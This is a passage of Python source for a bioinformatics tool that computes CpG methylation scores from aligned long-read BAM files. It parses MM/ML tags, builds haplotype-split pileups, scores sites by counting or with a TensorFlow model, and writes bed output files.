    parser.add_argument("-f", "--fasta",
                        required=True,
                        metavar="ref.fasta",
                        help="The reference fasta file.")
    parser.add_argument("-o", "--output_label",
                        required=True,
                        metavar="label",
                        help="Label for output files, which results in [label].bed/bw.")
    parser.add_argument("-p", "--pileup_mode",
                        required=False,
                        choices=["model", "count"],
                        default="model",
                        help="Use a model-based approach to score modifications across sites (model) "
                             "or a simple count-based approach (count). [default = %(default)s]")
    parser.add_argument("-d", "--model_dir",
                        required=False,
                        default=None,
                        metavar="/path/to/model/dir",
                        help="Full path to the directory containing the model (*.pb files) to load. [default = None]")
    parser.add_argument("-m", "--modsites",
                        required=False,
                        choices=["denovo", "reference"],
                        default="denovo",
                        help="Only output CG sites with a modification probability > 0 "
                             "(denovo), or output all CG sites based on the "
                             "supplied reference fasta (reference). [default = %(default)s]")
    parser.add_argument("-c", "--min_coverage",
                        required=False,
                        default=4,
                        type=int,
                        metavar="int",
                        help="Minimum coverage required for filtered outputs. [default: %(default)d]")
    parser.add_argument("-q", "--min_mapq",
                        required=False,
                        default=0,
                        type=int,
                        metavar="int",
                        help="Ignore alignments with MAPQ < N. [default: %(default)d]")
    parser.add_argument("-a", "--hap_tag",
                        required=False,
                        default="HP",
                        metavar="TAG",
                        help="The SAM tag containing haplotype information. [default: %(default)s]")
    parser.add_argument("-s", "--chunksize",
                        required=False,
                        default=500000,
                        type=int,
                        metavar="int",
                        help="Break reference regions into chunks "
                             "of this size for parallel processing. [default = %(default)d]")
    parser.add_argument("-t", "--threads",
                        required=False,
                        default=1,
                        type=int,
                        metavar="int",
                        help="Number of threads for parallel processing. [default = %(default)d]")
    return parser.parse_args()
def setup_logging(output_label):
"""
Set up logging to file.
"""
logname = "{}-aligned_bam_to_cpg_scores.log".format(output_label)
# ensure logging file does not exist, if so remove
if os.path.exists(logname):
os.remove(logname)
# set up logging to file
logging.basicConfig(filename=logname,
format="%(asctime)s: %(levelname)s: %(message)s",
datefmt='%d-%b-%y %H:%M:%S',
level=logging.DEBUG)
def log_args(args):
    """
    Record argument settings in log file.

    :param args: Parsed arguments namespace (from argparse).
    """
    logging.info("Using following argument settings:")
    # lazy %-style args defer string formatting to the logging framework
    for name, value in vars(args).items():
        logging.info("\t--%s: %s", name, value)
def get_regions_to_process(input_bam, input_fasta, chunksize, modsites, pileup_mode, model_dir, min_mapq, hap_tag):
    """
    Break every reference contig into chunks of at most ``chunksize`` bases
    for parallel processing. Each resulting sublist carries everything a
    worker needs:
    [bam path (str), fasta path (str), modsites (str), pileup_mode (str),
     model_dir (str or None), reference name (str), start coordinate (int),
     stop coordinate (int), min_mapq (int), hap_tag (str)]

    :param input_bam: Path to input bam file. (str)
    :param input_fasta: Path to reference fasta file. (str)
    :param chunksize: Chunk size (default = 500000). (int)
    :param modsites: Filtering method. (str: "denovo", "reference")
    :param pileup_mode: Site modification calling method. (str: "model", "count")
    :param model_dir: Full path to model directory to load (if supplied), otherwise is None.
    :param min_mapq: Minimum mapping quality score. (int)
    :param hap_tag: The SAM tag label containing haplotype information. (str)
    :return regions_to_process: List of lists containing region sizes. (list)
    """
    logging.info("get_regions_to_process: Starting chunking.")
    bam = pysam.AlignmentFile(input_bam, 'rb')
    regions_to_process = []
    # walk every contig in 1-based steps of chunksize
    for ref, ref_length in zip(bam.references, bam.lengths):
        for chunk_start in range(1, ref_length, chunksize):
            chunk_end = chunk_start + chunksize
            # the last chunk is truncated at the contig end
            stop = chunk_end - 1 if chunk_end < ref_length else ref_length
            regions_to_process.append([input_bam, input_fasta, modsites, pileup_mode,
                                       model_dir, ref, chunk_start, stop, min_mapq, hap_tag])
    bam.close()
    logging.info("get_regions_to_process: Created {:,} region chunks.\n".format(len(regions_to_process)))
    return regions_to_process
def cg_sites_from_fasta(input_fasta, ref):
    """
    Gets all CG site positions from a given reference region, and
    returns them as a set.

    :param input_fasta: A path to reference fasta file. (str)
    :param ref: Reference name. (str)
    :return cg_sites_ref_set: Set with all CG ref positions. (set)
    :raises ValueError: If ``ref`` is not found in the fasta file.
    """
    # None marks "reference not found yet"; the previous version left this
    # name unbound when no record matched, so the final check raised
    # NameError instead of the intended ValueError.
    cg_sites_ref_set = None
    # open fasta with BioPython and iterate over records
    with open(input_fasta) as fh:
        for record in SeqIO.parse(fh, "fasta"):
            # if record name matches this particular ref,
            if record.id == ref:
                # use regex to find all indices for 'CG' in the reference seq, e.g. the C positions
                cg_sites_ref_set = {i.start() for i in re.finditer('CG', str(record.seq.upper()))}
                # there may be some stretches without any CpGs in a reference region
                # handle these edge cases by adding a dummy value of -1 (an impossible coordinate)
                if not cg_sites_ref_set:
                    cg_sites_ref_set.add(-1)
                # once seq is found, stop iterating
                break
    # make sure the ref region was matched to a ref fasta seq
    if cg_sites_ref_set is None:
        logging.error("cg_sites_from_fasta: The sequence '{}' was not found in the reference fasta file.".format(ref))
        raise ValueError('The sequence "{}" was not found in the reference fasta file!'.format(ref))
    return cg_sites_ref_set
def get_mod_sequence(integers):
    """
    Translate the delta-encoded skip counts from a SAM Mm tag into the
    1-based running positions of each modified base.
    Example: [5, 12, 0] -> [6, 19, 20]
    In above example the 6th C, 19th C, and 20th C are modified
    See this example described in: https://samtools.github.io/hts-specs/SAMtags.pdf; Dec 9 2021

    :param integers: Iterable of integers (parsed from SAM Mm tag). (iter)
    :return: Generator of integers, 1-based counts of position of modified base in set of bases. (iter)
    """
    position = 0
    for skip in integers:
        # each tag value is the number of unmodified bases skipped before
        # the next modified one
        position += skip + 1
        yield position
def get_base_indices(query_seq, base, reverse):
    """
    Return the 0-based indices of every occurrence of ``base`` in the read.

    :param query_seq: The original read sequence (not aligned read sequence). (str)
    :param base: The nucleotide modifications occur on ('C'). (str)
    :param reverse: True/False whether sequence is reversed. (Boolean)
    :return: List of integers, 0-based indices of all bases in query seq. (list)
    """
    if reverse:
        # seq is stored reversed: take the reverse complement (via biopython)
        # so the indices refer to the correct orientation
        target_seq = str(Seq(query_seq).reverse_complement())
    else:
        target_seq = query_seq
    return [match.start() for match in re.finditer(base, target_seq)]
def parse_mmtag(query_seq, mmtag, modcode, base, reverse):
    """
    Get a generator of the 0-based indices of the modified bases in the query sequence.

    :param query_seq: The original read sequence (not aligned read sequence). (str)
    :param mmtag: The Mm tag obtained for the read ('C+m,5,12,0;'). (str)
    :param modcode: The modification code to search for in the tag ('C+m'). (str)
    :param base: The nucleotide modifications occur on ('C'). (str)
    :param reverse: True/False whether sequence is reversed. (Boolean)
    :return mod_base_indices: Generator of integers, 0-based indices of all mod bases in query seq. (iter)
    """
    # tags are written as: C+m,5,12,0;C+h,5,12,0;
    # if multiple mod types present in tag, must find relevant one first
    try:
        modline = next(x[len(modcode)+1:] for x in mmtag.split(';') if x.startswith(modcode))
    except StopIteration:
        # the requested modification code is absent from the tag;
        # previously a bare `except:` here also hid genuine errors
        return iter(())
    # first get the sequence of the mod bases from tag integers
    # this is a 1-based position of each mod base in the complete set of this base from this read
    # e.g., [6, 19, 20] = the 6th, 19th, and 20th C bases are modified in the set of Cs
    mod_sequence = get_mod_sequence(int(x) for x in modline.split(','))
    # get all 0-based indices of this base in this read, e.g. every C position
    base_indices = get_base_indices(query_seq, base, reverse)
    # use the mod sequence to identify indices of the mod bases in the read
    return (base_indices[i - 1] for i in mod_sequence)
def parse_mltag(mltag):
    """
    Convert the 0-255 integer codes from an Ml tag into probabilities in [0, 1),
    returned lazily as a generator.
    This is NOT designed to handle interleaved Ml format for multiple mod types!

    :param mltag: The Ml tag obtained for the read with('Ml:B:C,204,89,26'). (str)
    :return: Generator of floats, probabilities of all mod bases in query seq. (iter)
    """
    # zero codes map straight to 0; everything else is scaled by 1/256
    return (0 if code <= 0 else round(code / 256, 3) for code in mltag)
def get_mod_dict(query_seq, mmtag, modcode, base, mltag, reverse):
    """
    Build a dict mapping each modified base's index in the query sequence to
    its modification probability, using the paired SAM Mm/Ml tags.
    This is NOT designed to handle interleaved Ml format for multiple mod types!

    :param query_seq: The original read sequence (not aligned read sequence). (str)
    :param mmtag: The Mm tag obtained for the read ('C+m,5,12,0;'). (str)
    :param modcode: The modification code to search for in the tag ('C+m'). (str)
    :param base: The nucleotide modifications occur on ('C'). (str)
    :param mltag: The Ml tag obtained for the read with('Ml:B:C,204,89,26'). (str)
    :param reverse: True/False whether sequence is reversed. (Boolean)
    :return mod_dict: Dictionary with mod positions and scores. (dict)
    """
    positions = parse_mmtag(query_seq, mmtag, modcode, base, reverse)
    scores = parse_mltag(mltag)
    # zip pairs each modified-base index with its probability in order
    return dict(zip(positions, scores))
def pileup_from_reads(bamIn, ref, pos_start, pos_stop, min_mapq, hap_tag, modsites):
    """
    For a given region, retrieve all reads.
    For each read, iterate over positions aligned to this region.
    Build a list with an entry for each ref position in the region. Each entry has a list of 3-tuples, each of which
    includes information from a read base read aligned to that site. The 3-tuple contains strand information,
    modification score, and haplotype.
    (strand symbol (str), mod score (float), haplotype (int))
    Return the unfiltered list of base modification data.

    :param bamIn: AlignmentFile object of input bam file.
    :param ref: Reference name. (str)
    :param pos_start: Start coordinate for region. (int)
    :param pos_stop: Stop coordinate for region. (int)
    :param min_mapq: Minimum mapping quality score. (int)
    :param hap_tag: Name of SAM tag containing haplotype information. (str)
    :param modsites: Filtering method. (str: "denovo", "reference")
    :return basemod_data: Unfiltered list of base modification data (list)
    :return cg_sites_read_set: Set of positions in read consensus sequence with CG, given as reference position. The
        set is empty unless modsites is 'denovo' (set)
    """
    logging.debug("coordinates {}: {:,}-{:,}: (2) pileup_from_reads".format(ref, pos_start, pos_stop))
    basemod_data = []
    # These structures are only used for modsites denovo mode
    pos_pileup = []
    pos_pileup_hap1 = []
    pos_pileup_hap2 = []
    is_denovo_modsites = modsites == "denovo"
    # iterate over all reads present in this region
    for read in bamIn.fetch(contig=ref, start=pos_start, stop=pos_stop):
        # check if passes minimum mapping quality score
        if read.mapping_quality < min_mapq:
            #logging.warning("pileup_from_reads: read did not pass minimum mapQV: {}".format(read.query_name))
            continue
        # identify the haplotype tag, if any (default tag = HP)
        # values are 1 or 2 (for haplotypes), or 0 (no haplotype)
        # an integer is expected but custom tags can produce strings instead
        try:
            hap_val = read.get_tag(hap_tag)
            try:
                hap = int(hap_val)
            except ValueError:
                logging.error("coordinates {}: {:,}-{:,}: (2) pileup_from_reads: illegal haplotype value {}".format(ref, pos_start, pos_stop, hap_val))
                # fall back to "no haplotype"; previously `hap` was left
                # unassigned here, which raised NameError on the first read
                # or silently reused the previous read's haplotype
                hap = 0
        except KeyError:
            hap = 0
        # check for SAM-spec methylation tags
        # draft tags were Ml and Mm, accepted tags are now ML and MM
        # check for both types, set defaults to None and change if found
        mmtag, mltag = None, None
        try:
            mmtag = read.get_tag('Mm')
            mltag = read.get_tag('Ml')
        except KeyError:
            pass
        try:
            mmtag = read.get_tag('MM')
            mltag = read.get_tag('ML')
        except KeyError:
            pass
        if mmtag is not None and mltag is not None:
            # lazily size the per-position structures on the first usable read
            if not basemod_data:
                ref_pos_count = 1 + pos_stop - pos_start
                basemod_data = [[] for _ in range(ref_pos_count)]
                if is_denovo_modsites:
                    pos_pileup = [[] for _ in range(ref_pos_count)]
                    pos_pileup_hap1 = [[] for _ in range(ref_pos_count)]
                    pos_pileup_hap2 = [[] for _ in range(ref_pos_count)]
            is_reverse = bool(read.is_reverse)
            strand = "+"
            if is_reverse :
                strand = "-"
                rev_strand_offset = len(read.query_sequence) - 2
            # note that this could potentially be used for other mod types, but
            # the Mm and Ml parsing functions are not set up for the interleaved format
            # e.g., ‘Mm:Z:C+mh,5,12; Ml:B:C,204,26,89,130’ does NOT work
            # to work it must be one mod type, and one score per mod position
            mod_dict = get_mod_dict(read.query_sequence, mmtag, 'C+m', 'C', mltag, is_reverse)
            # iterate over positions (ends trimmed by 20 aligned pairs)
            for query_pos, ref_pos in read.get_aligned_pairs(matches_only=True)[20:-20]:
                # make sure ref position is in range of ref target region
                if ref_pos >= pos_start and ref_pos <= pos_stop:
                    ref_offset = ref_pos - pos_start
                    # building a consensus is MUCH faster when we iterate over reads (vs. by column then by read)
                    # we are building a dictionary with ref position as key and list of bases as val
                    if is_denovo_modsites:
                        query_base = read.query_sequence[query_pos]
                        pos_pileup[ref_offset].append(query_base)
                        if hap == 1:
                            pos_pileup_hap1[ref_offset].append(query_base)
                        elif hap == 2:
                            pos_pileup_hap2[ref_offset].append(query_base)
                    # identify if read is reverse strand or forward to set correct location
                    if is_reverse:
                        location = (rev_strand_offset - query_pos)
                    else:
                        location = query_pos
                    # check if this position has a mod score in the dictionary,
                    # if not assign score of zero
                    score = mod_dict.get(location, 0)
                    # Add tuple with strand, modification score, and haplotype to the list for this position
                    basemod_data[ref_offset].append((strand, score, hap))
        # if no SAM-spec methylation tags present, ignore read and log
        else:
            logging.warning("pileup_from_reads: read missing MM and/or ML tag(s): {}".format(read.query_name))
    cg_sites_read_set = set()
    if is_denovo_modsites:
        # scan the consensus of each pileup (all reads, hap1, hap2) for CG pairs
        for refpos_list in (pos_pileup, pos_pileup_hap1, pos_pileup_hap2):
            last_base = 'N'
            last_index = 0
            for index,v in enumerate(refpos_list):
                # find the most common base, if no reads present use N
                if len(v):
                    base = Counter(v).most_common(1)[0][0]
                else:
                    base = 'N'
                if last_base == 'C' and base == 'G' :
                    cg_sites_read_set.add(pos_start+last_index)
                # This restriction recreates the original code behavior:
                # - Advantage: Method can find a CpG aligning across a deletion in the reference
                # - Disadvantage: Method will find 'fake' CpG across gaps in the haplotype phasing
                #
                # The disadvantage is fixable, but first focus on identical output to make verification easy
                if base != 'N':
                    last_base = base
                    last_index = index
    return basemod_data, cg_sites_read_set
def filter_basemod_data(basemod_data, cg_sites_read_set, ref, pos_start, pos_stop, input_fasta, modsites):
    """
    Filter the per-position base modification data according to ``modsites``:
        "reference": keep positions matching a reference CG site that have at
                     least one base mod observation (includes unmodified CGs,
                     excludes non-CG modified sites).
        "denovo":    keep positions matching a CG in the read consensus
                     (may include read CGs absent from the reference, and may
                     drop CG sites with no modifications on either strand).

    :param basemod_data: List of base modification data per position, offset by pos_start. (list)
    :param cg_sites_read_set: Set with reference coordinates for all CG sites in consensus from reads. (set)
    :param ref: Reference name. (str)
    :param pos_start: Start coordinate for region. (int)
    :param pos_stop: Stop coordinate for region. (int)
    :param input_fasta: A path to reference fasta file. (str)
    :param modsites: Filtering method. (str: "denovo", "reference")
    :return filtered_basemod_data: List of (reference position, base mod data) 2-tuples,
        sorted by reference position. (list)
    """
    filtered_basemod_data = []
    if basemod_data and modsites == "reference":
        # keep sites matching a reference CG that carry observations
        cg_sites_ref_set = cg_sites_from_fasta(input_fasta, ref)
        filtered_basemod_data = [(pos_start + i, v) for i, v in enumerate(basemod_data)
                                 if (pos_start + i) in cg_sites_ref_set and v]
        logging.debug("coordinates {}: {:,}-{:,}: (3) filter_basemod_data: sites kept = {:,}".format(ref, pos_start, pos_stop, len(filtered_basemod_data)))
    elif basemod_data and modsites == "denovo":
        # keep sites matching a CG position in the read consensus
        filtered_basemod_data = [(pos_start + i, v) for i, v in enumerate(basemod_data)
                                 if (pos_start + i) in cg_sites_read_set]
        logging.debug("coordinates {}: {:,}-{:,}: (3) filter_basemod_data: sites kept = {:,}".format(ref, pos_start, pos_stop, len(filtered_basemod_data)))
    # drop references to the (potentially large) inputs
    del basemod_data
    del cg_sites_read_set
    return filtered_basemod_data
def calc_stats(df):
    """
    Summarize per-read modification probabilities for one site.

    :param df: Pandas dataframe with a 'prob' column of methylation probabilities.
    :return: (percent modified, modified count, unmodified count,
              mean modified score, mean unmodified score); the mean scores are
              the string "." when the corresponding read count is zero.
    """
    total = len(df)
    # a read counts as modified when its probability exceeds 0.5
    modified = df[df['prob'] > 0.5]
    unmodified = df[df['prob'] <= 0.5]
    mod = len(modified)
    unMod = len(unmodified)
    modScore = "." if mod == 0 else str(round(modified['prob'].mean(), 3))
    unModScore = "." if unMod == 0 else str(round(unmodified['prob'].mean(), 3))
    percentMod = 0.0 if mod == 0 else round(mod / total * 100, 1)
    return percentMod, mod, unMod, modScore, unModScore
def collect_bed_results_count(ref, pos_start, pos_stop, filtered_basemod_data):
    """
    Build bed-file rows for every retained reference position using the
    count-based scoring approach.
    For each position, summary statistics are computed (via calc_stats) for
    haplotype 1, haplotype 2, and all reads combined; every combination backed
    by at least one read contributes a sublist:
        [(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype,
         (5) coverage, (6) mod sites, (7) unmod sites, (8) mod score, (9) unmod score]

    :param ref: Reference name. (str)
    :param pos_start: Start coordinate for region. (int)
    :param pos_stop: Stop coordinate for region. (int)
    :param filtered_basemod_data: List of (reference position, base mod data) 2-tuples,
        sorted by reference position. (list)
    :return bed_results: List of sublists with information to write the output bed file. (list)
    """
    logging.debug("coordinates {}: {:,}-{:,}: (4) collect_bed_results_count".format(ref, pos_start, pos_stop))
    bed_results = []
    for refPosition, modinfoList in filtered_basemod_data:
        df = pd.DataFrame(modinfoList, columns=['strand', 'prob', 'hap'])
        # summarize haplotype 1, haplotype 2, then both haplotypes combined,
        # in that order (matches the original per-stanza layout)
        for label, subset in (("hap1", df[df['hap'] == 1]),
                              ("hap2", df[df['hap'] == 2]),
                              ("Total", df)):
            percentMod, mod, unMod, modScore, unModScore = calc_stats(subset)
            # only report combinations backed by at least one read
            if mod + unMod >= 1:
                bed_results.append([ref, refPosition, (refPosition + 1), percentMod,
                                    label, mod + unMod, mod, unMod, modScore, unModScore])
    return bed_results
def get_normalized_histo(probs, adj, min_coverage=4):
    """
    Create the array data structure needed to apply the model, for a given site.

    :param probs: List of methylation probabilities. (list)
    :param adj: A 0 or 1 indicating whether previous position was a CG. (int)
    :param min_coverage: Minimum number of reads required to score the site;
        previously hard-coded to 4, kept as the default for backward
        compatibility. (int)
    :return: List with normalized histogram and coverage (if min coverage met),
        else returns empty list. (list)
    """
    cov = len(probs)
    # sites below the coverage cutoff cannot be scored reliably
    if cov < min_coverage:
        return []
    # bin the per-read probabilities into 20 equal-width bins over [0, 1]
    hist = np.histogram(probs, bins=20, range=[0, 1])[0]
    norm = np.linalg.norm(hist)
    # divide hist by norm and add values to array
    # add either 0 (not adjacent to a prior CG) or 1 (adjacent to a prior CG) to final spot in array
    norm_hist = np.append(hist / norm, adj)
    return [norm_hist, cov]
def discretize_score(score, coverage):
    """
    Turn a model probability into estimated modified/unmodified read counts.

    A small correction makes the probability compatible with the read count:
    the modified-read estimate is rounded down for scores in (50, 65) or at
    or below 35, and rounded up otherwise, which pushes the adjusted score
    towards 0/50/100.

    :param score: Modification probability from the model, 0-100. (float)
    :param coverage: Number of reads at the site. (int)
    :return mod_reads: Estimated number of modified reads. (int)
    :return unmod_reads: Estimated number of unmodified reads. (int)
    :return adjusted_score: Percent of modified reads, 1 decimal place. (float)
    """
    estimated = score / 100 * float(coverage)
    # floor for 50 < score < 65 and for score <= 35; ceil everywhere else
    if 50 < score < 65 or score <= 35:
        mod_reads = int(np.floor(estimated))
    else:
        mod_reads = int(np.ceil(estimated))
    unmod_reads = int(coverage) - mod_reads
    if mod_reads == 0:
        adjusted_score = 0.0
    else:
        adjusted_score = round((mod_reads / (mod_reads + unmod_reads)) * 100, 1)
    return mod_reads, unmod_reads, adjusted_score
def apply_model(refpositions, normhistos, coverages, ref, pos_start, pos_stop, model, hap, bed_results):
    """
    Score all CG sites of one haplotype with the model, using an 11-wide
    sliding window over the per-site feature vectors.

    Appends one tuple per site to bed_results:
    [(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
     (6) mod sites, (7) unmod sites, (8) adjusted probability]

    :param refpositions: List with all CG positions. (list)
    :param normhistos: List with all normalized histogram feature vectors. (list)
    :param coverages: List with all CG coverages. (list)
    :param ref: Reference contig name. (str)
    :param pos_start: Start coordinate for region. (int)
    :param pos_stop: Stop coordinate for region. (int)
    :param model: The tensorflow model object.
    :param hap: Haplotype label (hap1, hap2, or Total). (str)
    :param bed_results: List that model results are appended to. (list)
    """
    # need more sites than the window width to form any prediction window
    if len(normhistos) <= 11:
        logging.warning("coordinates {}: {:,}-{:,}: apply_model: insufficient data for {}".format(ref, pos_start, pos_stop, hap))
        return
    # zero-pad 6 rows before and 4 after so every site gets a full window
    padded = np.pad(np.stack(normhistos), pad_width=((6, 4), (0, 0)), mode='constant', constant_values=0)
    windows = np.swapaxes(sliding_window_view(padded, 11, axis=0), 1, 2)
    predictions = np.clip(model.predict(windows), 0, 1)
    for idx, position in enumerate(refpositions):
        model_score = round(predictions[idx][0] * 100, 1)
        mod_reads, unmod_reads, adjusted_score = discretize_score(model_score, coverages[idx])
        bed_results.append((ref, position, (position + 1), model_score, hap, coverages[idx], mod_reads, unmod_reads, adjusted_score))
def collect_bed_results_model(ref, pos_start, pos_stop, filtered_basemod_data, model_dir):
    """
    Build model features for every CG site and score them with the model.

    For each reference position, a normalized histogram of methylation
    probabilities is built for the combined haplotypes and for each
    haplotype separately, then each set of sites is scored via apply_model().
    Produces a list of sublists ultimately used to write the output bed file:
    [(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
     (6) mod sites, (7) unmod sites, (8) adjusted probability]

    :param ref: Reference name. (str)
    :param pos_start: Start coordinate for region. (int)
    :param pos_stop: Stop coordinate for region. (int)
    :param filtered_basemod_data: List of (reference position, base mod data)
        2-tuples remaining after filtration, sorted by reference position. (list)
    :param model_dir: Full path to directory containing the model. (str)
    :return bed_results: List of sublists with information to write the output bed file. (list)
    """
    logging.debug("coordinates {}: {:,}-{:,}: (4) collect_bed_results_model".format(ref, pos_start, pos_stop))
    # silence tensorflow startup chatter before the (deferred) import
    os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
    import tensorflow as tf
    logging.getLogger('tensorflow').setLevel(logging.ERROR)
    model = tf.keras.models.load_model(model_dir, compile=False)
    # per-haplotype accumulators: (positions, normalized histograms, coverages)
    per_hap = {"Total": ([], [], []), "hap1": ([], [], []), "hap2": ([], [], [])}
    previous_position = 0
    # each value in filtered_basemod_data is a list of [strand, score, hap] entries
    for (refPosition, modinfoList) in filtered_basemod_data:
        # a C-index difference of 2 means this CG directly follows another CG
        adj = 1 if (refPosition - previous_position) == 2 else 0
        previous_position = refPosition
        for hap_label, hap_value in (("Total", None), ("hap1", 1), ("hap2", 2)):
            if hap_value is None:
                probs = [entry[1] for entry in modinfoList]
            else:
                probs = [entry[1] for entry in modinfoList if entry[2] == hap_value]
            # returns [norm_hist, cov] when min coverage is met, else an empty list
            feature = get_normalized_histo(probs, adj)
            if feature:
                positions, histos, coverages = per_hap[hap_label]
                histos.append(feature[0])
                coverages.append(feature[1])
                positions.append(refPosition)
    bed_results = []
    # score each haplotype set; apply_model only appends when data suffices
    for hap_label in ("Total", "hap1", "hap2"):
        positions, histos, coverages = per_hap[hap_label]
        apply_model(positions, histos, coverages, ref, pos_start, pos_stop, model, hap_label, bed_results)
    return bed_results
def run_process_region(arguments):
    """
    Process a given reference region to identify modified bases.
    Uses pickled args (input_file, ref, pos_start, pos_stop) to run
    pileup_from_reads() to get all desired sites (based on modsites option),
    then runs collect_bed_results() to summarize information.
    The sublists will differ between model or count method, but they always share the first 7 elements:
    [(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage, ...]
    :param arguments: Pickled list. (list)
    :return bed_results: List of sublists with information to write the output
        bed file, or None when the region produced no results. (list | None)
    """
    # unpack pickled items:
    # [bam path (str), fasta path (str), modsites option (str),
    #  pileup_mode option (str), model directory path (str),
    #  reference contig name (str), start coordinate (int),
    #  stop coordinate (int), minimum mapping QV (int), haplotype tag name (str)]
    input_bam, input_fasta, modsites, pileup_mode, model_dir, ref, pos_start, pos_stop, min_mapq, hap_tag = arguments
    logging.debug("coordinates {}: {:,}-{:,}: (1) run_process_region: start".format(ref, pos_start, pos_stop))
    # open the input bam file with pysam
    bamIn = pysam.AlignmentFile(input_bam, 'rb')
    # get all ref sites with mods and information from corresponding aligned reads
    basemod_data, cg_sites_read_set = pileup_from_reads(bamIn, ref, pos_start, pos_stop, min_mapq, hap_tag, modsites)
    # filter based on denovo or reference sites
    filtered_basemod_data = filter_basemod_data(basemod_data, cg_sites_read_set, ref, pos_start, pos_stop, input_fasta, modsites)
    # bam object no longer needed, close file
    bamIn.close()
    # initialize up front so an unexpected pileup_mode value cannot leave
    # bed_results unbound (previously a latent UnboundLocalError)
    bed_results = []
    if filtered_basemod_data:
        # summarize the mod results, depends on pileup_mode option selected
        if pileup_mode == "count":
            bed_results = collect_bed_results_count(ref, pos_start, pos_stop, filtered_basemod_data)
        elif pileup_mode == "model":
            bed_results = collect_bed_results_model(ref, pos_start, pos_stop, filtered_basemod_data, model_dir)
    logging.debug("coordinates {}: {:,}-{:,}: (5) run_process_region: finish".format(ref, pos_start, pos_stop))
    # BUG FIX: was `len(bed_results) > 1`, which silently dropped regions
    # containing exactly one result site; return any non-empty result list
    if bed_results:
        return bed_results
    return None
def run_process_region_wrapper(arguments):
    """
    Run run_process_region, reporting any worker-process exception on
    stderr (tagged with the worker PID) before re-raising it so the
    parent process still sees the failure.

    :param arguments: Pickled argument list, passed through unchanged. (list)
    :return: Whatever run_process_region returns.
    """
    try:
        return run_process_region(arguments)
    except Exception as e:
        message = "Exception thrown in worker process {}: {}\n".format(os.getpid(), e)
        sys.stderr.write(message)
        raise
def run_all_pileup_processing(regions_to_process, threads):
    """
    Distribute region jobs across a process pool and collect the results.

    The bed results differ between model and count method, but they always
    share the first 7 elements:
    [(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage, ...]

    :param regions_to_process: List of sublists defining regions (input_file, ref, pos_start, pos_stop). (list)
    :param threads: Number of worker processes to use. (int)
    :return flattened_bed_results: List of sublists, sorted by (contig, start),
        with information to write the output bed file. (list)
    """
    logging.info("run_all_pileup_processing: Starting parallel processing.\n")
    # only show a progress bar when stderr is an interactive terminal
    progress_bar = tqdm(total=len(regions_to_process), miniters=1, smoothing=0) if sys.stderr.isatty() else None
    bed_results = []
    with concurrent.futures.ProcessPoolExecutor(max_workers=threads) as executor:
        futures = [executor.submit(run_process_region_wrapper, region) for region in regions_to_process]
        # collect in order of completion, not submission
        for future in concurrent.futures.as_completed(futures):
            bed_results.append(future.result())
            if progress_bar:
                progress_bar.update(1)
    if progress_bar:
        progress_bar.close()
    logging.info("run_all_pileup_processing: Finished parallel processing.\n")
    # drop None entries (regions without results), then flatten the
    # list of per-region lists into a single list of site sublists
    flattened_bed_results = [entry for region_result in bed_results if region_result for entry in region_result]
    # ensure bed results are sorted by ref contig name, then start position
    logging.info("run_all_pileup_processing: Starting sort for bed results.\n")
    if flattened_bed_results:
        flattened_bed_results.sort(key=itemgetter(0, 1))
        logging.info("run_all_pileup_processing: Finished sort for bed results.\n")
    return flattened_bed_results
def write_output_bed(label, modsites, min_coverage, bed_results):
    """
    Write the output bed file(s) from the collected bed results.

    Results are split into combined (Total), hap1, and hap2 files; when no
    haplotype data is present the hap files end up empty and are removed.
    For each non-empty bed file a coverage-filtered companion file is also
    written, keeping only sites with coverage >= min_coverage.

    The per-site sublists differ slightly between pileup modes, but the
    first 7 fields are always:
    [(0) ref name, (1) start coord, (2) stop coord, (3) mod probability,
     (4) haplotype, (5) coverage, ...]

    :param label: Prefix for the output bed file names. (str)
    :param modsites: "reference" or "denovo", the CpG detection mode. (str)
    :param min_coverage: Minimum coverage to retain a site. (int)
    :param bed_results: List of sublists with per-site information. (list)
    :return output_files: Names of bed files successfully written. (list)
    """
    logging.info("write_output_bed: Writing unfiltered output bed files.\n")
    out_total = "{}.combined.{}.bed".format(label, modsites)
    out_hap1 = "{}.hap1.{}.bed".format(label, modsites)
    out_hap2 = "{}.hap2.{}.bed".format(label, modsites)
    cov_total = "{}.combined.{}.mincov{}.bed".format(label, modsites, min_coverage)
    cov_hap1 = "{}.hap1.{}.mincov{}.bed".format(label, modsites, min_coverage)
    cov_hap2 = "{}.hap2.{}.mincov{}.bed".format(label, modsites, min_coverage)
    # start from a clean slate: drop any leftover files from previous runs
    for stale in (out_total, out_hap1, out_hap2, cov_total, cov_hap1, cov_hap2):
        if os.path.exists(stale):
            os.remove(stale)
    with open(out_total, 'a') as fh_total, open(out_hap1, 'a') as fh_hap1, open(out_hap2, 'a') as fh_hap2:
        # route each entry to the file handle matching its haplotype label
        handles = {"Total": fh_total, "hap1": fh_hap1, "hap2": fh_hap2}
        for entry in bed_results:
            fh = handles.get(entry[4])
            if fh is not None:
                fh.write("{}\n".format("\t".join([str(field) for field in entry])))
    logging.info("write_output_bed: Writing coverage-filtered output bed files, using min coverage = {}.\n".format(min_coverage))
    output_files = []
    for raw_bed, filtered_bed in ((out_total, cov_total), (out_hap1, cov_hap1), (out_hap2, cov_hap2)):
        # an empty bed file means the haplotype was absent: remove it and
        # do not write a coverage-filtered version
        if os.stat(raw_bed).st_size == 0:
            os.remove(raw_bed)
            continue
        output_files.append(raw_bed)
        with open(raw_bed, 'r') as fh_in, open(filtered_bed, 'a') as fh_out:
            for line in fh_in:
                # field 5 is the coverage column
                if int(line.split('\t')[5]) >= min_coverage:
                    fh_out.write(line)
        # the filtered file may itself be empty; keep it only if it has sites
        if os.stat(filtered_bed).st_size == 0:
            os.remove(filtered_bed)
        else:
            output_files.append(filtered_bed)
    return output_files
def make_bed_df(bed, pileup_mode):
    """
    Construct a pandas dataframe from a bed file.

    Input columns depend on the pileup mode:
    count-based bed
    [(0) ref name, (1) start coord, (2) stop coord, (3) % mod sites, (4) haplotype, (5) coverage,
     (6) mod sites, (7) unmod sites, (8) mod score, (9) unmod score]
    OR
    model-based bed
    [(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
